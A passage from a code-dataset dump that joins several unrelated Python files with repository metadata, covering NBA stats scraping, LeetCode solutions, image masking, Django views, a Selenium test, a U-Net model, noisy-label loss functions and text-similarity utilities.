self.__policy_risk_repository.session().add(new_risk)
self.__policy_risk_repository.session().commit()
service_message.content = offer.Id
return service_message
def calculate_risks(self, vehicle: Vehicle, policy_offer_template: PolicyOfferTemplate) -> list[PolicyRisk]:
return self.__calculation_service.calculate(vehicle, policy_offer_template)
| bastyje/policyapp | python/src/services/policy_service.py | policy_service.py | py | 8,189 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "data_access.repositories.person_repository.PersonRepository",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "data_access.repositories.policy_repository.PolicyRepository",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "data_access.repositories.... |
6296104681 | import requests
import urllib.parse
from models import PlayByPlay
from constants import headers
from db_utils import insert_many
class PlayByPlayRequester:
url = 'https://stats.nba.com/stats/playbyplayv2'
def __init__(self, settings):
self.settings = settings
self.settings.db.bind([PlayByPlay])
def create_ddl(self):
"""
Initialize the table schema.
"""
self.settings.db.create_tables([PlayByPlay], safe=True)
def fetch_game(self, game_id):
"""
Build GET REST request to the NBA for a game, iterate over
the results and return them.
"""
params = self.build_params(game_id)
# Encode without safe '+', apparently the NBA likes unsafe url params.
params_str = urllib.parse.urlencode(params, safe=':+')
response = requests.get(url=self.url, headers=headers, params=params_str).json()
# pulling just the data we want
player_info = response['resultSets'][0]['rowSet']
rows = []
# looping over data to return.
for row in player_info:
new_row = {
'game_id': row[0],
'event_num': row[1],
'event_msg_type': row[2],
'event_msg_action_type': row[3],
'period': row[4],
'wc_time': row[5],
'home_description': row[7],
'neutral_description': row[8],
'visitor_description': row[9],
'score': row[10],
'score_margin': row[11],
'player1_id': self.get_null_id(row[13]),
'player1_team_id': self.get_null_id(row[15]),
'player2_id': self.get_null_id(row[20]),
'player2_team_id': self.get_null_id(row[22]),
'player3_id': self.get_null_id(row[27]),
'player3_team_id': self.get_null_id(row[29])
}
rows.append(new_row)
return rows
def insert_batch(self, rows, player_id_set):
"""
Batch insertion of records.
"""
# It looks like the NBA API returns some bad data that
# doesn't conform to their advertized schema:
# (team_id in the player_id spot).
# We can maybe get away with ignoring it.
# Check if id is in player_id cache.
# We need to preserve the row in general becuase it could still have
# good data for the correctly returned players.
for row in rows:
for key in ['player1_id', 'player2_id', 'player3_id']:
if row[key] is not None and row[key] not in player_id_set:
                    row[key] = None
insert_many(self.settings, PlayByPlay, rows)
def build_params(self, game_id):
"""
Create required parameters dict for the request.
"""
return {
'EndPeriod': 6,
'GameId': game_id,
'StartPeriod': 1
}
def get_null_id(self, id):
"""
This endpoint will return a player's id or player's team id as 0
sometimes. We will store 'null', as 0 breaks the foriegn key
constraint.
"""
if id == 0:
return None
return id
| Promise-Igbo/nba-sql | stats/play_by_play.py | play_by_play.py | py | 3,273 | python | en | code | null | github-code | 36 | [
{
"api_name": "models.PlayByPlay",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "models.PlayByPlay",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "urllib.parse.parse.urlencode",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "urll... |
21704376256 | #
# @lc app=leetcode.cn id=40 lang=python3
#
# [40] Combination Sum II
#
from typing import List
# @lc code=start
class Solution:
def combinationSum2(self, candidates: List[int], target: int) -> List[List[int]]:
ans = []
current = []
def dfs(i, target):
if target == 0:
ans.append(current[:])
return
if i >= len(candidates):
return
next_target = target - candidates[i]
if next_target >= 0:
current.append(candidates[i])
dfs(i + 1, next_target)
current.pop()
j = i + 1
while j < len(candidates) and candidates[i] == candidates[j]:
j += 1
dfs(j, target)
candidates.sort()
dfs(0, target)
return ans
# @lc code=end
Solution().combinationSum2([2,5,2,1,2], 5) | LinkTsang/.leetcode | solutions/40.组合总和-ii.py | 40.组合总和-ii.py | py | 780 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "typing.List",
"line_number": 11,
"usage_type": "name"
}
] |
69812436265 | import numpy as np
import cv2
from PIL import Image
# In this script we build the mask.
# Using a few OpenCV manipulations we create two files:
# the first with high-contrast roofs, the second with the roads highlighted;
# then, using the second file, we remove the roads from the first one.
image = "ZRYNEEUSVQ213QTY.png"
input = cv2.imread(image)
_, th = cv2.threshold(input, 130, 160, cv2.THRESH_TOZERO)
cv2.imwrite("th.png", th)
image = "th.png"
img = cv2.imread(image)
lower = np.array([0, 1, 1])
upper = np.array([0, 255, 255])
mask = cv2.inRange(img, lower, upper)
roads = cv2.bitwise_and(img, img, mask=mask)
height = int(np.size(img, 0))
width = int(np.size(img, 1))
for h in range(1, 500):
for w in range(1, 500):
color = str(roads[w, h])
if color != "[0, 145, 153]":
pass
else:
roads[h, w] = [0, 0, 255]
cv2.imwrite("roads.png", roads)
mask = Image.open("roads.png")
mask1 = Image.open("th.png")
for i in range (1, 6528):
for j in range (1, 7733):
if mask1.getpixel((i,j))[0] != 0 or mask1.getpixel((i,j))[1] != 0 or \
mask1.getpixel((i,j))[2] != 0:
mask1.putpixel((i, j), (255, 255, 255))
if (mask.getpixel((i, j))[0] != 0) or (mask.getpixel((i, j))[1] != 0) or (mask.getpixel((i, j))[2] != 0):
mask1.putpixel((i, j), (0, 0, 0))
mask1.save("dengi3.jpg", "JPEG") | kekartem/BuildingDefine | RunFirst.py | RunFirst.py | py | 1,512 | python | ru | code | 0 | github-code | 36 | [
{
"api_name": "cv2.imread",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "cv2.threshold",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "cv2.THRESH_TOZERO",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "cv2.imwrite",
"li... |
18913603323 | from collections import defaultdict
class Solution:
def valid_tree(self, n: int, edges: list[list[int]]) -> bool:
seen: set[int] = set()
children: dict[int, list[int]] = defaultdict(list)
for x, y in edges:
children[x].append(y)
children[y].append(x)
def dfs(node: int, prev: int) -> bool:
if node in seen:
return False
seen.add(node)
for child in children[node]:
if child == prev:
continue
if not dfs(child, node):
return False
return True
return dfs(0, 0) and len(seen) == n
| lancelote/leetcode | src/graph_valid_tree.py | graph_valid_tree.py | py | 689 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "collections.defaultdict",
"line_number": 7,
"usage_type": "call"
}
] |
11571428709 | from django.utils.module_loading import import_string
from django.urls import (RegexURLResolver, RegexURLPattern)
from CRM import settings
from collections import OrderedDict
def recursion_urls(pre_namespace, pre_url, urlpatterns, url_ordered_dict):
# None, '/', urlpatterns, url_ordered_dict
'''
    First recursion:
        url(r'^', include('web.urls')),
        url(r'^rbac/', include('rbac.urls', namespace='rbac')),
    Second recursion:
        'rbac', '/^rbac/', the urlpatterns variable from the rbac.urls module, url_ordered_dict
'''
for url in urlpatterns:
if isinstance(url, RegexURLResolver):
if pre_namespace:
if url.namespace:
namespace = '%s:%s' % (pre_namespace, url.namespace)
else:
namespace = pre_namespace
else:
if url.namespace:
namespace = url.namespace # 'rbac'
else:
namespace = None
recursion_urls(namespace, pre_url + url.regex.pattern, url.url_patterns, url_ordered_dict)
else:
if pre_namespace:
name = '%s:%s' % (pre_namespace, url.name) # rbac:role_list
else:
name = url.name
if not url.name:
                raise Exception('Every URL route must set a name attribute')
url = pre_url + url._regex # /^^login/
url_ordered_dict[name] = {
'url_name': name, 'url': url.replace('^', '').replace('$', '')
} # {'login':{'url_name': name, 'url': /login/},}
def all_url(ignore_namespace_list=None):
ignore_list = ignore_namespace_list or []
    # Ordered dict that stores every URL in the project
url_ordered_dict = OrderedDict()
    # Fetch all of the project's URLs
urls = import_string(settings.ROOT_URLCONF)
urlpatterns = []
'''
# urlpatterns = [
# url(r'^', include('web.urls')),
# url(r'^rbac/', include('rbac.urls', namespace='rbac')),
# ]
'''
for url in urls.urlpatterns:
if isinstance(url, RegexURLResolver) and url.namespace in ignore_list:
continue
urlpatterns.append(url)
recursion_urls(None, '/', urlpatterns, url_ordered_dict)
return url_ordered_dict
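# Shape of the returned mapping (illustrative entry for a project with an 'rbac' namespace;
# the concrete path is hypothetical):
#   {'rbac:role_list': {'url_name': 'rbac:role_list', 'url': '/rbac/role/list/'}, ...}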
| heyhito/CRM | rbac/server/routes.py | routes.py | py | 2,278 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.urls.RegexURLResolver",
"line_number": 16,
"usage_type": "argument"
},
{
"api_name": "collections.OrderedDict",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "django.utils.module_loading.import_string",
"line_number": 47,
"usage_type": "ca... |
71399122025 |
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.common.exceptions import NoSuchElementException
import time
driver = webdriver.Firefox()
driver.get('https://github.com/Vidoosh/Image-colorizer')
time.sleep(2)
code = driver.find_element(By.CSS_SELECTOR, '#repo-content-pjax-container > div > div > div.Layout.Layout--flowRow-until-md.Layout--sidebarPosition-end.Layout--sidebarPosition-flowRow-end > div.Layout-main > div.file-navigation.mb-3.d-flex.flex-items-start > span.d-none.d-md-flex.ml-2 > get-repo > feature-callout')
code.click()
time.sleep(1)
try:
download = driver.find_element(By.CSS_SELECTOR, '#local-panel > ul > li:nth-child(3) > a')
download.click()
print("Download initiated successfully")
except NoSuchElementException as e:
print("Download button not found")
finally:
driver.quit()
| sravanithummapudi/st | download_button.py | download_button.py | py | 901 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "selenium.webdriver.Firefox",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "time.sleep",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "selenium.web... |
71666166824 | # The following code was adapted from Week 3 Programming Assignment 2 in the Convolutional Neural Networks course by DeepLearning.AI offered on Coursera
# https://www.coursera.org/learn/convolutional-neural-networks/home/week/3
import tensorflow as tf
import numpy as np
from tensorflow.keras.layers import Input
from tensorflow.keras.layers import Conv2D
from tensorflow.keras.layers import MaxPooling2D
from tensorflow.keras.layers import Dropout
from tensorflow.keras.layers import Conv2DTranspose
from tensorflow.keras.layers import concatenate
import os
import numpy as np
import pandas as pd
import imageio
import matplotlib.pyplot as plt
get_ipython().run_line_magic('matplotlib', 'inline')
# load and split data
path = ''
image_path = os.path.join(path, './data/CameraRGB/')
mask_path = os.path.join(path, './data/CameraMask/')
image_list = os.listdir(image_path)
mask_list = os.listdir(mask_path)
image_list = [image_path+i for i in image_list]
mask_list = [mask_path+i for i in mask_list]
image_list_ds = tf.data.Dataset.list_files(image_list, shuffle=False)
mask_list_ds = tf.data.Dataset.list_files(mask_list, shuffle=False)
image_filenames = tf.constant(image_list)
masks_filenames = tf.constant(mask_list)
dataset = tf.data.Dataset.from_tensor_slices((image_filenames, masks_filenames))
# preprocess data
def process_path(image_path, mask_path):
img = tf.io.read_file(image_path)
img = tf.image.decode_png(img, channels=3)
img = tf.image.convert_image_dtype(img, tf.float32)
mask = tf.io.read_file(mask_path)
mask = tf.image.decode_png(mask, channels=3)
mask = tf.math.reduce_max(mask, axis=-1, keepdims=True)
return img, mask
def preprocess(image, mask):
input_image = tf.image.resize(image, (96, 128), method='nearest')
input_mask = tf.image.resize(mask, (96, 128), method='nearest')
return input_image, input_mask
image_ds = dataset.map(process_path)
processed_image_ds = image_ds.map(preprocess)
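# unet_model below calls conv_block, which is not defined in this excerpt; the following is
# a minimal sketch of the standard U-Net encoder block assumed by that call (two 3x3 Conv2D
# layers, optional Dropout, optional MaxPooling; returns (next_layer, skip_connection))
def conv_block(inputs=None, n_filters=32, dropout_prob=0, max_pooling=True):
    conv = Conv2D(n_filters, 3, activation='relu', padding='same', kernel_initializer='HeNormal')(inputs)
    conv = Conv2D(n_filters, 3, activation='relu', padding='same', kernel_initializer='HeNormal')(conv)
    if dropout_prob > 0:
        conv = Dropout(dropout_prob)(conv)
    # the un-pooled activation is kept as the skip connection for the decoder path
    next_layer = MaxPooling2D(pool_size=(2, 2))(conv) if max_pooling else conv
    return next_layer, conv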
"""
This function implements the convolutional decoder block
"""
def upsampling_block(expansive_input, contractive_input, n_filters=32):
# expansive_input is the input from the previous layer
# contractive_input is the input from the previous skip layer
up = Conv2DTranspose(n_filters, 3, strides=2, padding='same')(expansive_input)
# merge the previous output and the contractive_input
merge = concatenate([up, contractive_input], axis=3)
conv = Conv2D(n_filters, 3, activation='relu', padding='same', kernel_initializer='HeNormal')(merge)
conv = Conv2D(n_filters, 3, activation='relu', padding='same', kernel_initializer='HeNormal')(conv)
return conv
"""
This function implements the U-Net model by combining the encoder and decoder paths
"""
def unet_model(input_size=(96, 128, 3), n_filters=32, n_classes=23):
# input_size is the shape of the input
# n_filters is the number of filters for convolutional layers
# n_classes is the number of output classes
inputs = Input(input_size)
# encoding path
cblock1 = conv_block(inputs, n_filters)
# the first element of the output of each block will be the input of the next block
# the number of filters at each new step doubles
cblock2 = conv_block(cblock1[0], n_filters*2)
cblock3 = conv_block(cblock2[0], n_filters*4)
cblock4 = conv_block(cblock3[0], n_filters*8, dropout_prob=0.3)
cblock5 = conv_block(cblock4[0], n_filters*16, dropout_prob=0.3, max_pooling=False)
# decoding path
ublock6 = upsampling_block(cblock5[0], cblock4[1], n_filters*8)
# the output of the previous block is the expansive_input and the corresponding encoder output skip connection is the contractive_input
# the number of filters at each new step halves
ublock7 = upsampling_block(ublock6, cblock3[1], n_filters*4)
ublock8 = upsampling_block(ublock7, cblock2[1], n_filters*2)
ublock9 = upsampling_block(ublock8, cblock1[1], n_filters)
conv9 = Conv2D(n_filters, 3, activation='relu', padding='same', kernel_initializer='he_normal')(ublock9)
conv10 = Conv2D(n_classes, 1, padding='same')(conv9)
model = tf.keras.Model(inputs=inputs, outputs=conv10)
return model
# set model dimensions
img_height = 96
img_width = 128
num_channels = 3
unet = unet_model((img_height, img_width, num_channels))
unet.compile(optimizer='adam',
loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),
metrics=['accuracy'])
"""
This function displays both the input image and the corresponding true mask (desired output)
"""
def display(display_list):
plt.figure(figsize=(15, 15))
title = ['Input Image', 'True Mask', 'Predicted Mask']
for i in range(len(display_list)):
plt.subplot(1, len(display_list), i+1)
plt.title(title[i])
plt.imshow(tf.keras.preprocessing.image.array_to_img(display_list[i]))
plt.axis('off')
plt.show()
# create prediction
def create_mask(pred_mask):
pred_mask = tf.argmax(pred_mask, axis=-1)
pred_mask = pred_mask[..., tf.newaxis]
return pred_mask[0]
# train the model
EPOCHS = 40
VAL_SUBSPLITS = 5
BUFFER_SIZE = 500
BATCH_SIZE = 32
processed_image_ds.batch(BATCH_SIZE)
train_dataset = processed_image_ds.cache().shuffle(BUFFER_SIZE).batch(BATCH_SIZE)
print(processed_image_ds.element_spec)
model_history = unet.fit(train_dataset, epochs=EPOCHS)
"""
This function displays the input, prediction, and true images
"""
def show_predictions(dataset=None, num=1):
"""
Displays the first image of each of the num batches
"""
if dataset:
for image, mask in dataset.take(num):
pred_mask = unet.predict(image)
display([image[0], mask[0], create_mask(pred_mask)])
    else:
        # sample_image / sample_mask must be defined beforehand (e.g. one pair taken
        # from processed_image_ds) for this branch to work
        display([sample_image, sample_mask,
             create_mask(unet.predict(sample_image[tf.newaxis, ...]))])
# show results
show_predictions(train_dataset, 6)
# References
# [1] https://www.coursera.org/learn/convolutional-neural-networks/programming/omqTR/image-segmentation-with-u-net
| AndrewZhang126/Neural-Networks | U-Net.py | U-Net.py | py | 6,154 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "os.path.join",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 27,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 2... |
33377706423 | import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
eps = 1e-7
class SCELoss(nn.Module):
def __init__(self, num_classes=10, a=1, b=1):
super(SCELoss, self).__init__()
self.num_classes = num_classes
self.a = a
self.b = b
self.cross_entropy = nn.CrossEntropyLoss()
def forward(self, pred, labels):
ce = self.cross_entropy(pred, labels)
# RCE
pred = F.softmax(pred, dim=1)
pred = torch.clamp(pred, min=eps, max=1.0)
label_one_hot = F.one_hot(labels, self.num_classes).float().to(pred.device)
label_one_hot = torch.clamp(label_one_hot, min=1e-4, max=1.0)
rce = (-1 * torch.sum(pred * torch.log(label_one_hot), dim=1))
loss = self.a * ce + self.b * rce.mean()
return loss
class RCELoss(nn.Module):
def __init__(self, num_classes=10, scale=1.0):
super(RCELoss, self).__init__()
self.num_classes = num_classes
self.scale = scale
def forward(self, pred, labels):
pred = F.softmax(pred, dim=1)
pred = torch.clamp(pred, min=eps, max=1.0)
label_one_hot = F.one_hot(labels, self.num_classes).float().to(pred.device)
label_one_hot = torch.clamp(label_one_hot, min=1e-4, max=1.0)
loss = (-1 * torch.sum(pred * torch.log(label_one_hot), dim=1))
return self.scale * loss.mean()
class NRCELoss(nn.Module):
def __init__(self, num_classes, scale=1.0):
super(NRCELoss, self).__init__()
self.num_classes = num_classes
self.scale = scale
def forward(self, pred, labels):
pred = F.softmax(pred, dim=1)
pred = torch.clamp(pred, min=eps, max=1.0)
label_one_hot = F.one_hot(labels, self.num_classes).float().to(pred.device)
label_one_hot = torch.clamp(label_one_hot, min=1e-4, max=1.0)
norm = 1 / 4 * (self.num_classes - 1)
rce = (-1 * torch.sum(pred * torch.log(label_one_hot), dim=1))
return self.scale * norm * rce.mean()
class NCELoss(nn.Module):
def __init__(self, num_classes, scale=1.0):
super(NCELoss, self).__init__()
self.num_classes = num_classes
self.scale = scale
def forward(self, pred, labels):
pred = F.log_softmax(pred, dim=1)
label_one_hot = F.one_hot(labels, self.num_classes).float().to(pred.device)
loss = -1 * torch.sum(label_one_hot * pred, dim=1) / (-pred.sum(dim=1))
return self.scale * loss.mean()
class MAELoss(nn.Module):
def __init__(self, num_classes=10, scale=2.0):
super(MAELoss, self).__init__()
self.num_classes = num_classes
self.scale = scale
def forward(self, pred, labels):
pred = F.softmax(pred, dim=1)
label_one_hot = F.one_hot(labels, self.num_classes).float().to(pred.device)
loss = 1. - torch.sum(label_one_hot * pred, dim=1)
return self.scale * loss.mean()
class NMAE(nn.Module):
def __init__(self, num_classes=10, scale=1.0):
super(NMAE, self).__init__()
self.num_classes = num_classes
self.scale = scale
def forward(self, pred, labels):
pred = F.softmax(pred, dim=1)
label_one_hot = F.one_hot(labels, self.num_classes).float().to(pred.device)
norm = 1 / (self.num_classes - 1)
loss = 1. - torch.sum(label_one_hot * pred, dim=1)
return self.scale * norm * loss.mean()
class GCELoss(nn.Module):
def __init__(self, num_classes=10, q=0.7):
super(GCELoss, self).__init__()
self.q = q
self.num_classes = num_classes
def forward(self, pred, labels):
pred = F.softmax(pred, dim=1)
pred = torch.clamp(pred, min=eps, max=1.0)
label_one_hot = F.one_hot(labels, self.num_classes).float().to(pred.device)
loss = (1. - torch.pow(torch.sum(label_one_hot * pred, dim=1), self.q)) / self.q
return loss.mean()
class NGCELoss(nn.Module):
def __init__(self, num_classes=10, q=0.7, scale=1.0):
super(NGCELoss, self).__init__()
self.num_classes = num_classes
self.q = q
self.scale = scale
def forward(self, pred, labels):
pred = F.softmax(pred, dim=1)
pred = torch.clamp(pred, min=eps, max=1.0)
label_one_hot = F.one_hot(labels, self.num_classes).float().to(pred.device)
numerators = 1. - torch.pow(torch.sum(label_one_hot * pred, dim=1), self.q)
denominators = self.num_classes - pred.pow(self.q).sum(dim=1)
loss = numerators / denominators
return self.scale * loss.mean()
class NCEandRCE(nn.Module):
def __init__(self, alpha=1., beta=1., num_classes=10):
super(NCEandRCE, self).__init__()
self.num_classes = num_classes
self.nce = NCELoss(num_classes=num_classes, scale=alpha)
self.rce = RCELoss(num_classes=num_classes, scale=beta)
def forward(self, pred, labels):
return self.nce(pred, labels) + self.rce(pred, labels)
class NCEandMAE(nn.Module):
def __init__(self, alpha=1., beta=1., num_classes=10):
super(NCEandMAE, self).__init__()
self.num_classes = num_classes
self.nce = NCELoss(num_classes=num_classes, scale=alpha)
self.mae = MAELoss(num_classes=num_classes, scale=beta)
def forward(self, pred, labels):
return self.nce(pred, labels) + self.mae(pred, labels)
class NLNL(torch.nn.Module):
def __init__(self, train_loader, num_classes=10, ln_neg=1):
super(NLNL, self).__init__()
self.num_classes = num_classes
self.ln_neg = ln_neg
weight = torch.FloatTensor(num_classes).zero_() + 1.
if not hasattr(train_loader.dataset, 'targets'):
weight = [1] * num_classes
weight = torch.FloatTensor(weight)
else:
for i in range(num_classes):
weight[i] = (torch.from_numpy(np.array(train_loader.dataset.targets)) == i).sum()
weight = 1 / (weight / weight.max())
self.weight = weight.cuda()
self.criterion = torch.nn.CrossEntropyLoss(weight=self.weight)
self.criterion_nll = torch.nn.NLLLoss()
def forward(self, pred, labels):
labels_neg = (labels.unsqueeze(-1).repeat(1, self.ln_neg)
+ torch.LongTensor(len(labels), self.ln_neg).cuda().random_(1, self.num_classes)) % self.num_classes
labels_neg = torch.autograd.Variable(labels_neg)
assert labels_neg.max() <= self.num_classes-1
assert labels_neg.min() >= 0
assert (labels_neg != labels.unsqueeze(-1).repeat(1, self.ln_neg)).sum() == len(labels)*self.ln_neg
s_neg = torch.log(torch.clamp(1. - F.softmax(pred, 1), min=1e-5, max=1.))
s_neg *= self.weight[labels].unsqueeze(-1).expand(s_neg.size()).cuda()
labels = labels * 0 - 100
loss = self.criterion(pred, labels) * float((labels >= 0).sum())
loss_neg = self.criterion_nll(s_neg.repeat(self.ln_neg, 1), labels_neg.t().contiguous().view(-1)) * float((labels_neg >= 0).sum())
loss = ((loss+loss_neg) / (float((labels >= 0).sum())+float((labels_neg[:, 0] >= 0).sum())))
return loss
class FocalLoss(torch.nn.Module):
'''
https://github.com/clcarwin/focal_loss_pytorch/blob/master/focalloss.py
'''
def __init__(self, gamma=0.5, alpha=None, size_average=True):
super(FocalLoss, self).__init__()
self.gamma = gamma
self.alpha = alpha
if isinstance(alpha, (float, int)):
self.alpha = torch.Tensor([alpha, 1-alpha])
if isinstance(alpha, list):
self.alpha = torch.Tensor(alpha)
self.size_average = size_average
def forward(self, input, target):
if input.dim() > 2:
input = input.view(input.size(0), input.size(1), -1) # N,C,H,W => N,C,H*W
input = input.transpose(1, 2) # N,C,H*W => N,H*W,C
input = input.contiguous().view(-1, input.size(2)) # N,H*W,C => N*H*W,C
target = target.view(-1, 1)
logpt = F.log_softmax(input, dim=1)
logpt = logpt.gather(1, target)
logpt = logpt.view(-1)
pt = torch.autograd.Variable(logpt.data.exp())
if self.alpha is not None:
if self.alpha.type() != input.data.type():
self.alpha = self.alpha.type_as(input.data)
at = self.alpha.gather(0, target.data.view(-1))
logpt = logpt * torch.autograd.Variable(at)
loss = -1 * (1-pt)**self.gamma * logpt
if self.size_average:
return loss.mean()
else:
return loss.sum()
class NormalizedFocalLoss(torch.nn.Module):
def __init__(self, gamma=0.5, num_classes=10, alpha=None, size_average=True, scale=1.0):
super(NormalizedFocalLoss, self).__init__()
self.gamma = gamma
self.size_average = size_average
self.num_classes = num_classes
self.scale = scale
def forward(self, input, target):
target = target.view(-1, 1)
logpt = F.log_softmax(input, dim=1)
normalizor = torch.sum(-1 * (1 - logpt.data.exp()) ** self.gamma * logpt, dim=1)
logpt = logpt.gather(1, target)
logpt = logpt.view(-1)
pt = torch.autograd.Variable(logpt.data.exp())
loss = -1 * (1-pt)**self.gamma * logpt
loss = self.scale * loss / normalizor
if self.size_average:
return loss.mean()
else:
return loss.sum()
class NFLandRCE(torch.nn.Module):
def __init__(self, alpha=1., beta=1., num_classes=10, gamma=0.5):
super(NFLandRCE, self).__init__()
self.num_classes = num_classes
self.nfl = NormalizedFocalLoss(gamma=gamma, num_classes=num_classes, scale=alpha)
self.rce = RCELoss(num_classes=num_classes, scale=beta)
def forward(self, pred, labels):
return self.nfl(pred, labels) + self.rce(pred, labels)
class NFLandMAE(torch.nn.Module):
def __init__(self, alpha=1., beta=1., num_classes=10, gamma=0.5):
super(NFLandMAE, self).__init__()
self.num_classes = num_classes
self.nfl = NormalizedFocalLoss(gamma=gamma, num_classes=num_classes, scale=alpha)
self.mae = MAELoss(num_classes=num_classes, scale=beta)
def forward(self, pred, labels):
return self.nfl(pred, labels) + self.mae(pred, labels)
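# Illustrative smoke test (random tensors on CPU; printed values vary from run to run):
if __name__ == "__main__":
    logits = torch.randn(4, 10)
    labels = torch.randint(0, 10, (4,))
    print(SCELoss(num_classes=10)(logits, labels).item())
    print(NCEandRCE(alpha=1., beta=1., num_classes=10)(logits, labels).item())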
| hitcszx/lnl_sr | losses.py | losses.py | py | 10,369 | python | en | code | 42 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "torch.nn.CrossEntropyLoss",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "torch.nn",
... |
39209701807 | # Create your views here.
from django.shortcuts import render
from team.models import Player
from django.shortcuts import render, get_object_or_404, redirect, render_to_response
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
def home(request):
context = {'message': 'Here is a message!'}
return render(request, "team/home.html", context)
def roster(request):
player_list = Player.objects.all()
paginator = Paginator(player_list, 100)
page = request.GET.get('page')
try:
players=paginator.page(page)
except PageNotAnInteger:
players = paginator.page(1)
except EmptyPage:
players = paginator.page(1)
return render(request, "team/roster.html", {'players': players})
def player(request, pk):
player = get_object_or_404(Player, id=pk)
return render(request, "team/player.html", {'player': player})
| carolinp/Project-1 | team/views.py | views.py | py | 890 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.shortcuts.render",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "team.models.Player.objects.all",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "team.models.Player.objects",
"line_number": 12,
"usage_type": "attribute"
},
{
... |
34141195826 | import numpy as np
import torch
from snownlp import SnowNLP
from common_utils import *
from preprocessing.clean_data import batchify
def get_overlap(list1, list2):
"""
    Returns the number of distinct words that occur in both list1 and list2.
    Also returns the total number of distinct words in list1 and in list2 (can be
    used to compute similarity as a percentage, if desired)
Args:
list1 (string): filename corresponding to a list of words
list2 (string): filename corresponding to a list of words
Returns:
        overlap (int): number of distinct words occurring in both list1 and list2
len1 (int): number of words in list1
len2 (int): number of words in list2
"""
# File to List
wordlist1 = file_to_str(list1)
wordlist2 = file_to_str(list2)
# Tokenize Lists
s1 = SnowNLP(wordlist1) # need to use SnowNLP for Chinese-character lists
s2 = SnowNLP(wordlist2)
# Get List Lengths
wordlist1 = list(set(s1.words))
wordlist2 = list(set(s2.words))
len1 = len(wordlist1)
len2 = len(wordlist2)
# Count Overlapping Words
# overlap = [w2 for w2 in wordlist2 if w2 in wordlist1]
# Alternative to "Count Overlapping Words" with potentially better time complexity
combined_wordset = set(wordlist1).union(set(wordlist2))
overlap = len1 + len2 - len(combined_wordset)
return overlap, len1, len2
def get_embedding_similarity(list1, list2, emb):
"""
Given an embedding for a vocabulary and two lists of words from
that vocabulary, return the cosine distance between the average
word embeddings from each list.
Args:
list1 (string): filename corresponding to a list of words
list2 (string): filename corresponding to a list of words
        emb: word-embedding model or matrix (interface not yet decided; function is unimplemented)
"""
raise NotImplementedError
def get_political_diff(list1, list2, model_file):
# Load model and data
model = torch.load(model_file)
model.eval()
data1 = batchify(list1)
data2 = batchify(list2)
    # Inference: count positive ("political") predictions in each set
    positives1, positives2 = 0, 0
    for in1 in data1:
        output1 = model(in1[0]) # no labels
        positives1 += (output1.argmax(1) == 1).sum().item()
    for in2 in data2:
        output2 = model(in2[0])
        positives2 += (output2.argmax(1) == 1).sum().item()
    return positives1, positives2, len(data1.dataset), len(data2.dataset)
def get_political_ratio(list, model_file):
# Load model and data
model = torch.load(model_file)
model.eval()
data = batchify(list)
# Inference
positives = 0
for in1 in data:
output = model(in1[0]) # no labels
positives += (output.argmax(1) == 1).sum().item()
return positives / len(data.dataset)
def get_longest_subsequence_length(list1, list2):
"""
Returns length of longest subsequence common to list1 and list2.
Also returns total number of words in list1 and in list2 (can be used
to compute similarity as a percentage, if desired)
Args:
list1 (string): filename corresponding to a list of words
list2 (string): filename corresponding to a list of words
Returns:
length (int): length of longest subsequence
len1 (int): number of words in list1
len2 (int): number of words in list2
"""
# File to List
wordlist1 = file_to_str(list1)
wordlist2 = file_to_str(list2)
# Tokenize Lists
s1 = SnowNLP(wordlist1)
s2 = SnowNLP(wordlist2)
# Get List Lengths
wordlist1 = list(s1.words)
wordlist2 = list(s2.words)
len1 = len(wordlist1)
len2 = len(wordlist2)
length = longest_subsequence(wordlist1, wordlist2)
return length, len1, len2
def longest_subsequence(list1, list2):
"""
Return length of longest subsequence common to list1 and list2.
Here, a subsequence is defined as a list of ordered entries
    occurring consecutively in a list.
Example:
[1,2,3] and [4] are subsequences of [1,2,3,4]
[1,3,4] and [1,3,2] are not subsequences of [1,2,3,4]
Args:
list1 (list): a list whose elements can be of any class
that implements __eq__
list2 (list): a list whose elements are the same class as
those of list1
Returns:
l (int): the length of the longest subsequence
"""
# T[i, j] will store the length of longest substring
# ending at list1[i] and list2[j]
n = len(list1)
m = len(list2)
T = np.zeros((n, m))
for i in range(n):
for j in range(m):
if list1[i] == list2[j]:
if i == 0 or j == 0:
T[i, j] = 1
else:
T[i, j] = T[i-1, j-1] + 1
return np.max(T)
def _cosine_dist(v1, v2):
return np.dot(v1, v2) / (np.linalg.norm(v1) * np.linalg.norm(v2))
def _euclidean_dist(v1, v2):
return np.linalg.norm(v1 - v2)
def _manhattan_dist(v1, v2):
    return np.linalg.norm(v1 - v2, ord=1)
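# Illustrative check of longest_subsequence (pure lists/NumPy, no data files needed):
# the longest common contiguous run of [1, 2, 3, 4] and [0, 2, 3, 5] is [2, 3], length 2.
if __name__ == "__main__":
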